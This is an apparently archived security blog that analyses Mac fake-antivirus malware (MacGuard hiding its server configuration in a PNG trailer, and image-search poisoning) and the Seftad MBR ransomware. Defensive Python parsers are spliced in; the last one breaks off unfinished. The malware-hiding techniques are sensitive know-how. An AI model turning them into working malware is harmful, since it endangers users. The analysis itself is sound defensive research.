style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Within <b style="mso-bidi-font-weight: normal;">__ZL21getDownloadedFilePathv</b>, it calls <b style="mso-bidi-font-weight: normal;">__ZL14getConfigParami</b> again to get the downloaded installer's name; we will look at that function in the next part. The file is downloaded to "<b style="mso-bidi-font-weight: normal;">/Application/[installer_name].app.zip</b>".</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7jS3Rz2T6-9XYY0nSPoOZVYOIyemzNp6dRUJVBrohD7vwjbpXUio6y2QPoVeVRsdSdL0BQVVvZLvWkJNjtwCOcPZHMMtE9b780dQoKx3gt5g7XJFVGFdNT49y65c-07d0E5CEhjvLtEzd/s1600/Figure5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7jS3Rz2T6-9XYY0nSPoOZVYOIyemzNp6dRUJVBrohD7vwjbpXUio6y2QPoVeVRsdSdL0BQVVvZLvWkJNjtwCOcPZHMMtE9b780dQoKx3gt5g7XJFVGFdNT49y65c-07d0E5CEhjvLtEzd/s1600/Figure5.png" /></span></a></div></div><div align="center" class="MsoNormal" style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 5: Get the Downloaded File Path<o:p></o:p></span></u><br />
<u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u><br />
<u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u><br />
<div style="text-align: left;"><ol start="3"><li><b><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Identifying the remote server URL</span></b></li>
</ol><div><b><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></b></div></div></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">As the name implies, <b style="mso-bidi-font-weight: normal;">__ZL14getConfigParami</b> reads the configuration file and returns to the caller the value selected by the argument the caller passed.<o:p></o:p></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">The configuration file is actually a PNG image stored inside the <b style="mso-bidi-font-weight: normal;">avRunner</b> package, named <b style="mso-bidi-font-weight: normal;">DownloadPict.png</b>, as shown in Figure 7.<o:p></o:p></span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbjk3wH900oMAxVTOJAzMNRUhQOHCyBgImz1n2F1AjCzPj7O0a4ehCe_p1cmwFUnOJbr2i2yqJaMkgtQfxM_0ZYz2sMTH6auVfLGAUpY5QVfh6tHP-Wp0lR_tP7AtFZBg5y6bYQxbYCgvm/s1600/Figure6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbjk3wH900oMAxVTOJAzMNRUhQOHCyBgImz1n2F1AjCzPj7O0a4ehCe_p1cmwFUnOJbr2i2yqJaMkgtQfxM_0ZYz2sMTH6auVfLGAUpY5QVfh6tHP-Wp0lR_tP7AtFZBg5y6bYQxbYCgvm/s1600/Figure6.png" /></span></a></div></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 6: Downloader’s Configuration File Reading<o:p></o:p></span></u><br />
<u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u><br />
<u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilz2QQ1o4JWz396EiYxgZeYB9uU5xz0KDBw3-q-HDul8bSdPm2PVC_jRjkUaQ_ISqWKierA8v77eLyudlV_FDeRcoHInF8lNlisSSDcumMLPJLtJrhChyANfbPLZqusSpX0kIXKYNj1Qmh/s1600/Figure7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilz2QQ1o4JWz396EiYxgZeYB9uU5xz0KDBw3-q-HDul8bSdPm2PVC_jRjkUaQ_ISqWKierA8v77eLyudlV_FDeRcoHInF8lNlisSSDcumMLPJLtJrhChyANfbPLZqusSpX0kIXKYNj1Qmh/s1600/Figure7.png" /></span></a></div></div><div align="center" class="MsoNormal" style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><u></u><u><o:p></o:p></u></span></div><div align="center" class="MsoNormal" style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 7: avRunner Package Contents<o:p></o:p></span></u></div><div align="center" class="MsoNormal" style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Basically, as the second part of Figure 6 shows, it reads the last byte of the picture file, <b style="mso-bidi-font-weight: normal;">27h</b>, which is the starting offset of the encoded data. It then reads <b style="mso-bidi-font-weight: normal;">27h</b> bytes of encoded data and decodes them with a simple decoding routine. The decoded configuration data is highlighted in Figure 8.<o:p></o:p></span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<ol start="4"><li><b><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Decoding and retrieving the URL's variables</span></b></li>
</ol><div><b><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></b></div></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">The configuration data is separated by the delimiter <b style="mso-bidi-font-weight: normal;">“;”</b>. In short, the configuration data can be represented as follows:<o:p></o:p></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Index 0 => Installer’s file name<o:p></o:p></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Index 1 => First remote server IP address<o:p></o:p></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Index 2 => Second remote server IP address<o:p></o:p></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Index 3 => Affiliate ID<o:p></o:p></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">For example, the caller passes argument 0 to get the installer’s file name, and so forth.<o:p></o:p></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
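To make the trailer layout concrete, here is an added Python example (not the post's code and not the malware's) that builds a constructed carrier PNG, finds the bytes appended after the IEND chunk, and reads the configuration the way the post describes: the last byte gives the 27h offset/size, that many encoded bytes are decoded and split on ";". Assumptions: the offset is counted back from the end of the file, a single-byte XOR stands in for the undescribed decoding routine, and the field values (including the 203.0.113.x addresses) are constructed.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# The post only says the blob is decoded with a "simple decoding method";
# a single-byte XOR is assumed here so the example runs end to end.
XOR_KEY = 0x5A
FIELD_NAMES = ["installer_name", "server_1", "server_2", "affiliate_id"]


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Build one PNG chunk: length, type, data, CRC over type + data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_carrier_png(config: str) -> bytes:
    """Constructed sample: a 1x1 RGB PNG with the encoded config and its size
    byte appended after IEND, mirroring the DownloadPict.png layout."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00\x00\x00")  # filter byte + one black pixel
    image = (PNG_SIGNATURE + png_chunk(b"IHDR", ihdr)
             + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b""))
    encoded = bytes(b ^ XOR_KEY for b in config.encode())
    return image + encoded + bytes([len(encoded)])


def png_image_end(data: bytes) -> int:
    """Walk the chunk list and return the offset just past IEND; any bytes
    after it are not part of the image and deserve a closer look."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype = data[pos + 4:pos + 8]
        pos += 12 + length  # 4 length + 4 type + data + 4 crc
        if ctype == b"IEND":
            return pos
    raise ValueError("IEND chunk not found")


def extract_trailer_config(data: bytes) -> dict:
    """Mirror the read in __ZL14getConfigParami: the last byte of the file
    (27h in the sample) gives both the offset back from the end and the size
    of the encoded blob; decode it and split on ';' into the four fields."""
    trailer = data[png_image_end(data):]
    if not trailer:
        raise ValueError("nothing appended after IEND")
    size = trailer[-1]
    encoded = trailer[-1 - size:-1]
    if size == 0 or len(encoded) != size:
        raise ValueError("trailer shorter than its size byte claims")
    decoded = bytes(b ^ XOR_KEY for b in encoded).decode("ascii")
    fields = decoded.split(";")
    if len(fields) != len(FIELD_NAMES):
        raise ValueError("expected 4 ';'-separated fields, got %d" % len(fields))
    return dict(zip(FIELD_NAMES, fields))


def get_config_param(data: bytes, index: int) -> str:
    """Index-based lookup matching the caller passing 0..3."""
    return extract_trailer_config(data)[FIELD_NAMES[index]]


def download_path(data: bytes) -> str:
    """Path __ZL21getDownloaderFilePathv derives from index 0 (per the post)."""
    return "/Application/%s.app.zip" % get_config_param(data, 0)
```

Running png_image_end against a real DownloadPict.png and checking for bytes past IEND is the quick triage check; the decode step is only as good as the assumed XOR stand-in.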
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzmaiXyz4anBgY1C_dmlpZky5ZIdhkljUAT9GkF0xBJeCwV-xHnuS-bHW_GMIjAxorfDmmNe-mccC4FELXJS5Jajs5ZnGHMAFITVWGT952FUosZBH9JHKxVNMeki9oEIqL2FxX3rOCLhgH/s1600/Figure8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzmaiXyz4anBgY1C_dmlpZky5ZIdhkljUAT9GkF0xBJeCwV-xHnuS-bHW_GMIjAxorfDmmNe-mccC4FELXJS5Jajs5ZnGHMAFITVWGT952FUosZBH9JHKxVNMeki9oEIqL2FxX3rOCLhgH/s1600/Figure8.png" /></span></a></div></div><div align="center" class="MsoNormal" style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 8: Decoding DownloadPict Configuration File<o:p></o:p></span></u></div><div align="center" class="MsoNormal" style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">After the download completes, <b>MacGuard</b> is launched automatically and the downloaded ZIP archive is removed from the local drive.<o:p></o:p></span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<b><i><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Register your copy of MacGuard</span></u></i></b><br />
<b><i><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u></i></b><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Kaspersky Lab has published the second part of <a href="http://www.securelist.com/en/blog/208188067/Mac_Protector_Register_your_copy_now_Part_2">Mac Protector: Register your copy now!</a> Not surprisingly, the latest variant uses a similar string retrieval method to the one described in <b>Decoding and retrieving the URL's variables</b>.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></div>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com2tag:blogger.com,1999:blog-1022731470813881575.post-13503359666894516192011-05-15T15:28:00.002+08:002011-05-15T15:31:51.268+08:00[NEWS] Mac OSX First Ever Fake AntivirusThe first fake antivirus for Mac OS X, called MacDefender/MacProtector/MacSecurity, was released recently.<br />
<br />
I had a chance to come across this fake AV when I did a Google image search a few days back. Unsurprisingly, this Mac fake AV works exactly the same way as the Windows fake AVs do: it also presents a fake browser page showing the user that their machine has been infected with malware.<br />
<br />
When I did a Google image search, I opened an image indexed by Google, and Google redirected me to a compromised website with a "hidden" (from a novice computer user's point of view) JavaScript. After the compromised page is opened, it immediately redirects the user to another page under the top-level domain <b>"cz.cc"</b>, which is where the fake AV page is displayed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img820.imageshack.us/img820/6196/picture1gpz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="http://img820.imageshack.us/img820/6196/picture1gpz.png" width="320" /></a></div><div style="text-align: center;"><u>Figure 1: Image Indexed by Google</u></div><div style="text-align: center;"><u><br />
</u></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEhFTcpYHigO_JTUW3ermaKiaxmAAwoynhLx4HYWksMiJppN5Aslg0Wcm7NIJ3C0JD4SnU_ZBbA5VvHxd8L4lHEr7i0gAQ8dTzaoUt244IAEfsYBST1GohtEzB-__oebw02kJXGrGwHeKG/s1600/Picture+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEhFTcpYHigO_JTUW3ermaKiaxmAAwoynhLx4HYWksMiJppN5Aslg0Wcm7NIJ3C0JD4SnU_ZBbA5VvHxd8L4lHEr7i0gAQ8dTzaoUt244IAEfsYBST1GohtEzB-__oebw02kJXGrGwHeKG/s320/Picture+2.png" width="320" /></a></div><div style="text-align: center;"><u><br />
</u></div><div style="text-align: center;"><u>Figure 2: Script Redirection From Compromised Site</u></div><div style="text-align: center;"><u><br />
</u></div><div style="text-align: center;"><u><br />
</u></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT08dfGmyXh06QE_WSMozmIjqh3_pOYhtJZfX06MRiKz0CJLiFmbKuZuaVHOza4gl-n50hQ4FJ_ObuxIDA0YmygXYEQqHlSKhRvRHYUucR4txu95fsLC_ufkTyeAvCADjNcke7RrznE_X1/s1600/Picture+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT08dfGmyXh06QE_WSMozmIjqh3_pOYhtJZfX06MRiKz0CJLiFmbKuZuaVHOza4gl-n50hQ4FJ_ObuxIDA0YmygXYEQqHlSKhRvRHYUucR4txu95fsLC_ufkTyeAvCADjNcke7RrznE_X1/s320/Picture+3.png" width="320" /></a></div><div style="text-align: center;"><u>Figure 3: Fake AV Scan Result</u></div><div style="text-align: center;"><u><br />
</u></div><div style="text-align: left;">Immediately after the scan finishes, it prompts with a dialog box asking to download and execute the file once the user clicks the <b>"Remove all"</b> button.</div><div style="text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWCtRqmvq6WSQOpSYYrSHJc3xGzPLjrFV53ODyZuXFtiZoLX8Y7nqBJoHDd8JXplGJsLJW85u9f1Xlc-CdLa4n_0B7u0zyRVaJGe9kAH2p1sphVaMKXjKrPbfthtdprHJQoNDtWGU_BRse/s1600/Picture+4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWCtRqmvq6WSQOpSYYrSHJc3xGzPLjrFV53ODyZuXFtiZoLX8Y7nqBJoHDd8JXplGJsLJW85u9f1Xlc-CdLa4n_0B7u0zyRVaJGe9kAH2p1sphVaMKXjKrPbfthtdprHJQoNDtWGU_BRse/s320/Picture+4.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><u>Figure 4: Download Fake AV File</u></div><div class="separator" style="clear: both; text-align: center;"><u><br />
</u></div><div class="separator" style="clear: both; text-align: left;"><u><br />
</u></div><div class="separator" style="clear: both; text-align: left;">If you are interested in getting a registered version of MacSecurity, you can visit this post from Kaspersky Lab, <a href="http://www.securelist.com/en/blog/11252/Mac_Protector_Register_your_copy_now">http://www.securelist.com/en/blog/11252/Mac_Protector_Register_your_copy_now</a>, where you can get a list of valid license keys!</div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5oGF5F2iMcaZFgN5JkQRM9DM2REGODISo-lhscjbvhvl18gx-oDHrxaPDrO9zr8TOA3pdSNgOKnt3X10aLEHAU5FtktVH-1gFM9KAuwzthbWGEuo1QHgZKmipMnaiZ03EqueTop41YbPZ/s1600/Mac+OS+X+10.6-2011-05-15-15-22-04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5oGF5F2iMcaZFgN5JkQRM9DM2REGODISo-lhscjbvhvl18gx-oDHrxaPDrO9zr8TOA3pdSNgOKnt3X10aLEHAU5FtktVH-1gFM9KAuwzthbWGEuo1QHgZKmipMnaiZ03EqueTop41YbPZ/s320/Mac+OS+X+10.6-2011-05-15-15-22-04.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><u>Figure 5: Fake AV Scanning in Action</u></div><div class="separator" style="clear: both; text-align: center;"><u><br />
</u></div><div class="separator" style="clear: both; text-align: left;">Now I have a registered MacProtector to clean the "detected" file =)</div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitsEB0KlxKitkhyphenhyphen3AwwQOd6cyxrWqtqAvKYUvszmkMjVIUGBYRiqXwyeeitCXNy4_nLAaOBlWdCyiP5ShrOjNA_ud84wPvNs9anAY3bbS06E1L-Qw0SrDyALMlzkNolGvO0djdzSvNzpIr/s1600/Mac+OS+X+10.6-2011-05-15-15-21-38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitsEB0KlxKitkhyphenhyphen3AwwQOd6cyxrWqtqAvKYUvszmkMjVIUGBYRiqXwyeeitCXNy4_nLAaOBlWdCyiP5ShrOjNA_ud84wPvNs9anAY3bbS06E1L-Qw0SrDyALMlzkNolGvO0djdzSvNzpIr/s320/Mac+OS+X+10.6-2011-05-15-15-21-38.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><u>Figure 6: Registered Copy of MacProtector</u></div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div style="text-align: left;"><span class="Apple-style-span" style="font-size: large;"><b>Reference</b></span><br />
<span class="Apple-style-span" style="font-size: large;"><b><br />
</b></span><br />
You can visit <a href="http://blog.unmaskparasites.com/2011/05/05/thousands-of-hacked-sites-seriously-poison-google-image-search-results/">http://blog.unmaskparasites.com/2011/05/05/thousands-of-hacked-sites-seriously-poison-google-image-search-results/</a> for excellent research on the technical details of Google image SEO poisoning.<br />
<br />
Have fun!<br />
<br />
</div>Signing off @x9090x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com1tag:blogger.com,1999:blog-1022731470813881575.post-45629487883729520202010-12-04T16:53:00.002+08:002010-12-14T00:23:27.441+08:00My PC Was Stoned by Ransom Seftad<div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2d7880pD7f2e0gRaG1vz_SSyuQRjIEqXcH4MvTun641uMU24EEyVx2oDaqLZVayJjYOwcNQGVso1m3VOc1lTl6s053nq0naV_cSqTnKkiSCIHnRUy-V0qXdoD81R8sgiAEr_5D-PFByvN/s1600/Clone+of+Analyst+-+WXP+SP2-2010-12-04-16-14-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2d7880pD7f2e0gRaG1vz_SSyuQRjIEqXcH4MvTun641uMU24EEyVx2oDaqLZVayJjYOwcNQGVso1m3VOc1lTl6s053nq0naV_cSqTnKkiSCIHnRUy-V0qXdoD81R8sgiAEr_5D-PFByvN/s1600/Clone+of+Analyst+-+WXP+SP2-2010-12-04-16-14-54.png" /></a></div><br />
<br />
If you are unlucky enough to be a victim of the Seftad MBR ransomware, do not worry: this MBR infector does not do what it claims. It does not encrypt your hard drive at all; it merely infects your hard disk drive's MBR:<br />
<br />
<u>Original Clean MBR</u><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkFWAZYJPai-XSehGHSqpzuIENkcgsCH5sL-7D5BZXC1cD0gwXo5u6tWeyx3VSIygZA-o8_fgzV8fFkimd5W5yuuAh_65KCwNM-xqcFZQSSny2UJvSU5tYcioHBaDdaIhxxjwO_SErUuyC/s1600/orig_clean_mbr.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkFWAZYJPai-XSehGHSqpzuIENkcgsCH5sL-7D5BZXC1cD0gwXo5u6tWeyx3VSIygZA-o8_fgzV8fFkimd5W5yuuAh_65KCwNM-xqcFZQSSny2UJvSU5tYcioHBaDdaIhxxjwO_SErUuyC/s640/orig_clean_mbr.png" width="464" /></a></div><br />
<br />
<u>Seftad infected MBR</u><br />
<u><br />
</u><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7fCAi_A_AZK60xi9Hojn3pClWkgHgk1OA5UIptRzdvG1zl7DWLDL4EuMIAuved5sDdoDzxmQB40-PQ1Gkl5mt6pYQsTxhWyNsHKqG4dFP9k6Lq2XwNb-IRieVECr4_JljoiJx-Ce2UMe6/s1600/infected_mbr_part1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7fCAi_A_AZK60xi9Hojn3pClWkgHgk1OA5UIptRzdvG1zl7DWLDL4EuMIAuved5sDdoDzxmQB40-PQ1Gkl5mt6pYQsTxhWyNsHKqG4dFP9k6Lq2XwNb-IRieVECr4_JljoiJx-Ce2UMe6/s640/infected_mbr_part1.png" width="467" /></a></div><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwqlwqc9s8-h2wpYU1W2S1fozLw7qGFaUQF-VnN2IV-OP0HsczKOs-Zb_s9DwkT7yj17Dnb6pR8Ox0gDxf1vyVO6a50CUAtlwscL9Wy90X0IvN-E8HeShpP_lBgsAxiHFJWnRwaRcrObUW/s1600/infected_mbr_part2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwqlwqc9s8-h2wpYU1W2S1fozLw7qGFaUQF-VnN2IV-OP0HsczKOs-Zb_s9DwkT7yj17Dnb6pR8Ox0gDxf1vyVO6a50CUAtlwscL9Wy90X0IvN-E8HeShpP_lBgsAxiHFJWnRwaRcrObUW/s640/infected_mbr_part2.png" width="577" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT2DHfku6pkc7BAZN0SeVFdGZzcZekhDwbjIyca2THHhNg4UbOQ_fMlvWAthvwU-6l_-4ESbOrj-_ULJa2CQqCXiOPMRYbDhyYph6M8nXUvNYr7KPZbG3M4FPU-ID-zB15eA8C96fngiqf/s1600/infected_mbr_part3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT2DHfku6pkc7BAZN0SeVFdGZzcZekhDwbjIyca2THHhNg4UbOQ_fMlvWAthvwU-6l_-4ESbOrj-_ULJa2CQqCXiOPMRYbDhyYph6M8nXUvNYr7KPZbG3M4FPU-ID-zB15eA8C96fngiqf/s640/infected_mbr_part3.png" width="576" /></a></div><br />
Basically, it replaces the original MBR with a malicious one that is 3 sectors long. The original MBR is stored at the 4th sector, which is offset <b>0x800</b>.<br />
<br />
The password the user enters is reduced to a word-sized hash value, which can be found here:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFCBYFptWmuxUsmjlHay-Yjlu1Y0AJ175FpYkQZBV-S0K6_CEFu8vsmxrh8HmDXGhpfIoBCk2GCJ1X834Y9Mf7gF03-MlOj-eX_ZmxW8XzDHJHFSS4nEpDXTyj04qpBLTxkN-nUYBsxhLl/s1600/mbr_seftad.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFCBYFptWmuxUsmjlHay-Yjlu1Y0AJ175FpYkQZBV-S0K6_CEFu8vsmxrh8HmDXGhpfIoBCk2GCJ1X834Y9Mf7gF03-MlOj-eX_ZmxW8XzDHJHFSS4nEpDXTyj04qpBLTxkN-nUYBsxhLl/s640/mbr_seftad.PNG" width="640" /></a></div><br />
The address <b>7FFA</b> is the real-mode address in the boot sector, and the password value is actually located at offset <b>0x5FA</b>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2IlRtznuTFWSiQc9F0y0j2fmg1ilVPCjsIE2c_yhVUo1aaxlrPBxXCjEgD-EXuhcTVw0RARNlFVinHAFdLpOX_q69Fq3cdBXJgLZFICnwW8ztwt7GnG1K3rQQ4ljPZ28yyUz3rmrEfsFT/s1600/password.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2IlRtznuTFWSiQc9F0y0j2fmg1ilVPCjsIE2c_yhVUo1aaxlrPBxXCjEgD-EXuhcTVw0RARNlFVinHAFdLpOX_q69Fq3cdBXJgLZFICnwW8ztwt7GnG1K3rQQ4ljPZ28yyUz3rmrEfsFT/s640/password.png" width="640" /></a></div><br />
<br />
which is <b>0x3c01.</b><br />
<br />
Nevertheless, this MBR infection can be easily fixed by running 'Fixmbr' from the Windows Recovery Console.<br />
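As an added Python example (not the post's code), here is a triage helper for a raw disk image in the layout the post describes: it checks whether a sane MBR sits at the backup offset 0x800, reads the stored password hash word at 0x5FA, and copies the backup back over sector 0, comparable to what Fixmbr does from the Recovery Console. The sample image is constructed from placeholder bytes rather than real Seftad code, and the partition-table sanity rules are a heuristic assumed here.

```python
import struct

SECTOR = 512
BACKUP_OFFSET = 0x800      # where the post says the original MBR is kept
HASH_OFFSET = 0x5FA        # word hash of the typed password (real-mode 7FFA)
BOOT_SIGNATURE = b"\x55\xaa"


def looks_like_mbr(sector: bytes) -> bool:
    """Heuristic (assumed here, not from the post): a classic MBR has the
    0x55AA signature and a partition table whose status bytes are 0x00 or
    0x80, with at least one populated entry that has a non-zero start LBA."""
    if len(sector) != SECTOR or sector[510:512] != BOOT_SIGNATURE:
        return False
    populated = 0
    for i in range(4):
        entry = sector[446 + 16 * i:446 + 16 * (i + 1)]
        status, ptype = entry[0], entry[4]
        lba_start = struct.unpack("<I", entry[8:12])[0]
        if status not in (0x00, 0x80):
            return False
        if ptype != 0:
            if lba_start == 0:
                return False
            populated += 1
    return populated > 0


def stored_password_hash(image: bytes) -> int:
    """Little-endian word the infected code keeps at 0x5FA (0x3c01 in the post)."""
    return struct.unpack_from("<H", image, HASH_OFFSET)[0]


def diagnose(image: bytes) -> dict:
    """Compare the sector at LBA 0 with the backup copy at 0x800."""
    current = image[:SECTOR]
    backup = image[BACKUP_OFFSET:BACKUP_OFFSET + SECTOR]
    return {
        "current_mbr_valid": looks_like_mbr(current),
        "backup_mbr_valid": looks_like_mbr(backup),
        "differs": current != backup,
        "password_hash": stored_password_hash(image),
    }


def restore_original_mbr(image: bytes) -> bytes:
    """Write the backup sector back over LBA 0, refusing if the backup does
    not pass the sanity check. The infected sectors 1-3 are left in place
    for the analyst; a normal MBR never hands control to them."""
    backup = image[BACKUP_OFFSET:BACKUP_OFFSET + SECTOR]
    if not looks_like_mbr(backup):
        raise ValueError("no sane MBR at 0x800; refusing to overwrite sector 0")
    return backup + image[SECTOR:]


def build_sample_image() -> bytes:
    """Constructed 8-sector image in the infected layout (placeholder bytes,
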